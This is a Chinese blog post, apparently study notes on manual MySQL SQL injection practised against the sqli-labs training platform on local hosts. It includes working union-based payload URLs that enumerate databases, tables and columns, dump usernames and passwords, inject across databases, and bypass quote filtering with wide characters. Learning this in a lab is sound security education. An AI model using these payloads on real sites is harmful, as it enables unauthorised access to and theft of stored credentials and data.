Mysql注入

最新推荐文章于 2024-05-24 15:55:04 发布
最新推荐文章于 2024-05-24 15:55:04 发布
阅读量238 收藏 1
点赞数
分类专栏: 第二步 黑客基础知识
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47036000/article/details/106318878
版权

Mysql数据库的机构分层
    1.Mysql数据库包含
        数据库A   一个数据库就是一个网站了
            表名
                列名
                    数据
        数据库B    

sql注入产生条件(判断注入)
    1.可控变量
    2.带入数据库查询
    3.变量未存在过滤或过滤不严谨
    
sql注入分为
    数据库类型
        Mysql,mssql,oracle,Access,postsql
    提交方式:
        post,get,http,cookie,全局提交
    参数类型:
        字符型,数字型,
    盲注类型
        逻辑注入
        延时注入
        二次注入
    sql查询类型
        select
        insert
        updata
        delete
    绕过注入
        WAF防护
        代码防护
        函数防护

**************Mysql 注入基本流程******************************    
Mysql注入流程,以sqlilabs第一关回显注入为例,先搭建sql-libs平台
    
    (1)判断注入,获取数据库名,表名,列名等
    如果: and 1=1(显示正确)  and 1=2(显示错误)  则有注入点
    and or xor 与或非命令
    select * from users where id = 0 and 1=1 真且真  真
    select * from users where id = 0 and 1=2 真且假  假
    
    如果:select * from users where id = '0 and 1=2'  //其中的and被引号引住变成了字符串,失去了功能
    要改成:select * from users where id = '0' and 1=2 --+ //  --+是注释的意思,+表示空格

    联合查询:order by * 查表的列名 判断有多少列,二分法,假如判断出有3列
    然后 ?id=1' union select 1,2,3 --+   // union合并两条select 语句
    (2)判断回显点,获取数据名
    http://192.168.23.131/sqli-labs-master/Less-1/?id=-1' union select 1,2,3 --+  //id =-1 前面加-是为了报错,可以显示后面的内容,判断回显点
    ?id=-1' union select 1,database(),3 --+ //假如回显点为第二个位置,报错显示数据库名字
    union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
               group_concat():全部显示 table_name:security数据库里面表单名称  意思是查系统数据库里面存储表面的表
    (3)获取列名:
    获取数据库名security下的表名users下面列名信息
    ?id=-2' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and  table_schema='security'--+

    获取数据:
    http://127.0.0.1:8080/sqlilabs/Less-1/?id=-2' union select 1,password,username from users limit 2,1--+  //其中的limit 2,1 2代表第几条数据 和where id = 3同样可以实现
    
知识点    
table_name: 表名
column_name:列名
table_schema:数据库名
information_schema.tables:存储表名信息的表
information_schema.columns:存储列名信息的表
information_schema.schemata:存储数据库名信息的表
mysql中符号“.”代表下一级
如:information_schema.tables:数据库infor...下的tables表

user()   查询数据库用户
database()  查询数据库名
version()   查询数据库版本
@@version_compile_os  查询操作系统

*******************跨库注入**********************    
    

获取所有数据库名:
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+


获取指定数据库名injection的表名信息
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='injection'--+

获取指定表名admin的列名信息
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' and table_schema='injection'--+

获取指定数据
http://127.0.0.1:8080/sqlilabs/Less-2/?id=-1 union select 1,user,pass from injection.admin


**********路径问题*************
路径获取方法
    报错显示
    遗留文件
    漏洞暴路径:discuz 爆路径
    一些框架可以网上搜索配置信息,里面储存了网站的路径

**********Mysql 过滤型注入*************
mysql 宽字节绕过注入  环境:sqlilabs less32 

函数过滤 addslashes    过滤 单引号,双引号 后面加斜杆
魔术引号php配置 magic_quotes_gpc   php里面的配置,开启了就自动过滤 引号
宽字节绕过注入: 引号前 %df

Trevain
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
详细|通过mysql学习sql注入
st3pby的博客
06-08 953
本文来自 【网络安全学习圈】圈内师傅的学习成果,已将其入圈费用返还,如果你也想一块学习,欢迎加入。圈内规划了数个月的学习内容,并提供相应的学习资源和建议,以及一个浓厚的学习氛围。
sql注入(mysql)
m0_73452266的博客
04-20 529
sql注入基础
Mysql注入详细讲解
最新发布
2401_84466359的博客
05-24 761
*原理:**用户向数据库里存入恶意的数据,在数据被插入到数据库之前,肯定会对数据库进行转义处理,但用户输入的数据的内容肯定是一点摸样也不会变的存进数据库里,而一般都默认为数据库里的信息都是安全的,查询的时候不会进行处理,所以当用户的恶意数据被web程序调用的时候就有可能出发SQL注入。GET/POST提交数据时,发现提交的数据被加密了(可能js加密),那么在提交数据前,抓包,解密,将注入语句写好,然后将整个语句进行加密(相同加密算法),再将数据发过去。HTTP 头注入常常发生在程序采集用户信息的模块中。
mysql 注入
qq_58970968的博客
07-31 1940
同一个服务器下的不同网站之间的数据库用户有可能是不同的,如果a网站可以有SQL注入,他的用户是root的话就可以实现跨站数据库入侵,去查看网站b下面的数据库;unionselect1,'x',3intooutfile'D\\x.php'--+写入文件‘x’到x.php中;当magic_quotes_gpc=On时,输入数据中含单引号(’)、双引号(”)、反斜线(\)与NULL(NULL字符)等字符,都会被加上反斜线;用来读取数据库下的文件;...
简要MYSQL注入
山兔的博客
03-31 506
SQL注入,一般不是一些低权限的,都会被认为是很严重的漏洞,不是所有的SQL注入都可以对网站后台进行getshell,它是需要条件的,这个条件我们称为权限。有的注入点,它是没有办法进行getshell的,他只能得到一些敏感信息,然后我们在一步步的去获取权限SQL注入的危害有两个,一个是危害到数据,一个是危害到网站的权限,满足条件的注入点就可以,没有这个条件的就不行。
MySQL注入
qq_45031509的博客
04-13 954
mysql注入 1.信息收集 1)操作系统:@@version_compile_cs(不同的系统对数据库操作语句的大小写区分) 2)数据库名:database() 3)数据库用户:user()(专门管理数据库的账户),root为最高权限,容易导致跨站注入数 据。普通用户:只能注入自己网站。 4)数据库版本:version()(选择注入) 5)其他网站路径(进行文件读取,为高权限读取做准备) 2.数据注入 1)低版本(暴力或结合读取查询,表名,列名用猜的方式) 2)高版本(information
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
mysql注入绕过技术
06-04
mysql注入绕过技术
mysql注入环境
01-16
MySQL注入环境是一个重要的网络安全话题,主要关注的是数据库系统的安全性和数据保护。在本文中,我们将深入探讨MySQL注入的原理、如何在Linux或Windows环境中搭建测试环境,以及如何使用sqli-labs进行实战演练。 ...
MYSQL 注入天书
03-04
MYSQL 注入天书,Sqli-labs 使用手册,结合Sqli-labs讲解Mysql注入方法。
第01篇:MySQL注入点写WebShell的5种方式1
08-03
1、在默认数据库 test 中创建测试表admin和测试数据,新建test用户授予FILE权限 2、使用test用户连接 1、利用Union select 写入
9.web架构和抓包分析
weixin_47036000的博客
05-05 243
web架构和抓包分析 web工作机制 写入网址 DNS解析:本地缓存host,网关,dns服务器,找到IP 经过网关 路由 到达对方主机 访问80,443 3次握手 (1)浏览器发送请求包 (2)服务器回应响应包和请求包 (3)收到响应包建立连接,回应响应表,服务器建立连接 建立连接 HTTP...
什么是MySql注入,怎么防止MySql注入
小道仙的后宫
12-30 980
什么是MySql注入 1、先来看百度百科是怎么说的 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 简单说,就是我们在拼接sql的时候,没有过滤用户的非法sql,导致查询结果和我...
Mysql手工注入
luopanhong的博客
03-18 4077
MySQL手工注入SQL注入注入的手法或者工具上分类的话可以分为:· 手工注入(手工来构造调试输入payload)· 工具注入(使用工具,如sqlmap)下面主要讲解的是如何通过手工来显式注入MySQL数据库。说到显式注入,SQL又可以分为:· 显式注入· 盲注入这两种分类的主要区别在于能否从页面上直接获取数据库信息。手工注入流程判断注入注入的第一步是得判断该处是否是一个注入点。或者说判断此处...
SQL注入(回显)-DVWA
xy_sugar的博客
01-23 2619
概述 LOW等级 1、首先尝试正常操作,输入1 可是这里web应用通过查询数据库,获取了id为1的用户的信息,猜测SQL语句为: 2、接下来检测是否存在SQL注入漏洞,输入1’   报错,则说明单引号注入到SQL语句中报错,存在SQL注入漏洞 尝试数字型,查询结果与id=1时的结果一样 尝试第二种情况,成功执行 尝试双引号,也没有成功 所以可知这里...
sql注入漏洞之异或注入
SoporAeternus12的博客
04-06 7425
在介绍异或注入之前,先看看这个 mysql> select 'aaa'=0; +---------+ | 'aaa'=0 | +---------+ | 1 | +---------+ 1 row in set, 1 warning (0.00 sec) #这里可以看到返回结果是1,表示true mysql> select 'aaa'=1; +---------+ | 'aaa'=1 | +---------+ | 0 | +---------+ 1 row in se
手工注入(猫舍为例)
Greedy Hat的博客
07-31 2156
显错注入实例
mysql注入啥意思_什么是mysql注入
weixin_31111015的博客
01-18 181
展开全部MySQL SQL 注入SQL注入可能是目前互联网上存在的最丰32313133353236313431303231363533e58685e5aeb931333433643661富的编程缺陷。 这是未经授权的人可以访问各种关键和私人数据的漏洞。 SQL注入不是Web或数据库服务器中的缺陷,而是由于编程实践较差且缺乏经验而导致的。 它是从远程位置执行的最致命和最容易的攻击之一。我们永远不要信...
MySQL注入常用函数及逻辑运算
qq_41320827的博客
02-20 328
原文地址:www.cluren.xyz MySQL注入常用函数: 函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@datadir 数据库路径 @@basedi...
mysql 注入扫描
12-02
MySQL注入扫描是一种针对网站或应用程序的安全漏洞进行检测的技术。通过MySQL注入漏洞,攻击者可以将恶意代码注入到网站或应用程序中,从而获取敏感信息、通过数据库执行命令或者破坏网站功能。因此,对于网站或应用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值